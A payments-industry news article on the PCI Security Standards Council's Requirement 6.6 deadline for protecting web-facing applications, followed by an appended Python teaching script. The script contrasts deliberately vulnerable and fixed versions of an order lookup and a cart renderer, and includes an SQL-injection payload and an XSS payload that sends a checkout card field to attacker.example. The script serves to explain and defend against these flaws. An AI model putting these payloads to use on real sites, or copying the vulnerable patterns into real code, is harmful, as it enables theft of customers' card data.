Yet another important security deadline is at hand. On Monday, the PCI Security Standards Council, the independent body that administers the Payment Card Industry data-security standard, will make mandatory protection measures in its rules about Internet-facing software applications that the Council currently classifies as best practices. While the PCI rules apply to all entities that touch payment card data, including issuers, processors, and merchants, security experts are paying especially close attention to what merchants, the source of most publicly known breaches of card data, are doing or not doing to meet the new mandates.

Two experts contacted by Digital Transactions News did not have data about how many merchants will be compliant come June 30, but they're keeping their fingers crossed. “I do anticipate that for many of the merchants, some of these controls are in or close to in place,” says Troy Leach, technical director at the Wakefield, Mass.-based PCI Council. “We think the adoption is going to be fairly easy for merchants.”

Kristin Lovejoy, director of governance and risk-management strategy at Armonk, N.Y.-based International Business Machines Corp., predicts most of the large merchants IBM advises about card security will meet the new mandates. But, as with earlier deadlines, many companies, mostly mid-sized and smaller ones, have put off action until the last minute even though the June 2008 deadline was disclosed with the release of PCI's version 1.1 in September 2006. “We're hearing a lot of, 'uh oh, we've got to do something and we've got to do it today,'” says Lovejoy, who works out of Washington, D.C.

The major card networks are responsible for enforcement, and they've said little publicly about the coming change. The new requirements involve a brief, 65-word part of the PCI rules called Requirement 6.6.
Requirement 6.6 says all Web-facing applications must be protected against known attacks by either of two methods: having all custom application code reviewed for common vulnerabilities by an organization that specializes in application security, or installing an application-layer firewall in front of the applications. The preceding requirement, 6.5, lists a number of common coding flaws. Some of the most serious attacks that exploit those flaws are injection attacks such as structured query language (SQL) injection, and cross-site scripting (XSS). Very generally, SQL injection lets an attacker alter the database queries an application builds from user input, giving the attacker read or write access to the database behind a Web site; a successful XSS attack plants attacker-controlled script in pages the site serves to its users, where it runs with the victim's session and so bypasses the application's access controls, enabling crimes such as phishing or the capture of card data typed into online shopping carts. “With those types of vulnerabilities, they're very easy to populate over a large amount of computers,” says Leach.

Based on the many questions it received at a PCI meeting last year, the PCI Council in April issued a white paper clarifying Requirement 6.6. The paper suggested a number of ways to find vulnerabilities, including manual and automated reviews. Lovejoy says spending by IBM's clients to find and correct their applications' vulnerabilities “is all over the map.” Merchants with the biggest jobs are those that have outsourced most of their application development and don't have a good picture of the payment-related security properties of their software, she adds.

Meanwhile, the PCI Council is starting a program to enhance the uniformity of PCI assessments, and is considering augmenting the training of its Qualified Security Assessors, according to Leach.
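The two attack classes the article names, shown as an added example that is not part of the original article or of any PCI Council material: a Python script with a constructed in-memory SQLite order table, placing an order lookup that splices user input into the SQL text beside the same lookup with a bound parameter, and a cart-item renderer that reflects the item name into HTML beside one that escapes it. The table contents, the payload strings and the attacker.example host are all constructed for the demonstration; the code review that Requirement 6.6 calls for is exactly what would catch the two "vulnerable" functions.

```python
import html
import sqlite3

# Constructed sample data (not from the article): an order table for an
# online shopping cart, with card numbers already stored in masked form.
ORDERS = [
    (1001, "alice", "4111********1111"),
    (1002, "bob", "5500********0004"),
    (1003, "carol", "3400******00009"),
]


def make_db() -> sqlite3.Connection:
    """Build a throwaway in-memory database holding the constructed orders."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (id INTEGER, customer TEXT, card_masked TEXT)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?)", ORDERS)
    return conn


def lookup_order_vulnerable(conn: sqlite3.Connection, customer: str) -> list:
    # SQL injection: untrusted input is spliced into the SQL text, so a quote
    # in the input closes the literal and the rest becomes query syntax.
    sql = f"SELECT id, customer, card_masked FROM orders WHERE customer = '{customer}'"
    return conn.execute(sql).fetchall()


def lookup_order_safe(conn: sqlite3.Connection, customer: str) -> list:
    # Bound parameter: the driver sends the value separately from the query
    # text, so the input is compared as data and cannot change the structure.
    sql = "SELECT id, customer, card_masked FROM orders WHERE customer = ?"
    return conn.execute(sql, (customer,)).fetchall()


# Classic tautology payload; the closing quote is supplied by the vulnerable
# query template, yielding  WHERE customer = 'x' OR '1'='1'
SQLI_PAYLOAD = "x' OR '1'='1"


def render_cart_item_vulnerable(item_name: str) -> str:
    # XSS: the item name is reflected into the page unchanged, so a name that
    # contains markup is rendered, and executed, as markup by the browser.
    return f'<li class="cart-item">{item_name}</li>'


def render_cart_item_safe(item_name: str) -> str:
    # html.escape turns <, >, &, " and ' into character entities, so the
    # browser displays the text instead of interpreting it.
    return f'<li class="cart-item">{html.escape(item_name)}</li>'


# Constructed payload: script that would ship the card field of the checkout
# form to a hypothetical attacker host when the cart page is viewed.
XSS_PAYLOAD = (
    "<script>new Image().src='https://attacker.example/?c='"
    "+document.forms[0].card.value</script>"
)


def demo() -> dict:
    """Run both attacks against both versions and report what each returns."""
    conn = make_db()
    return {
        # The vulnerable lookup returns every order; the safe one returns none.
        "sqli_vulnerable_rows": len(lookup_order_vulnerable(conn, SQLI_PAYLOAD)),
        "sqli_safe_rows": len(lookup_order_safe(conn, SQLI_PAYLOAD)),
        # The vulnerable renderer emits a live <script> tag; the safe one does not.
        "xss_vulnerable_has_script": "<script>" in render_cart_item_vulnerable(XSS_PAYLOAD),
        "xss_safe_has_script": "<script>" in render_cart_item_safe(XSS_PAYLOAD),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Run as a script, the output shows the tautology payload pulling all three orders from the unparameterized query and none from the parameterized one, and the script tag surviving only in the unescaped rendering. An application-layer firewall, the other option Requirement 6.6 allows, would try to recognize and block these payloads in the HTTP request; fixing the code removes the flaw itself rather than filtering one spelling of it, which is why the two options are not equivalent in practice.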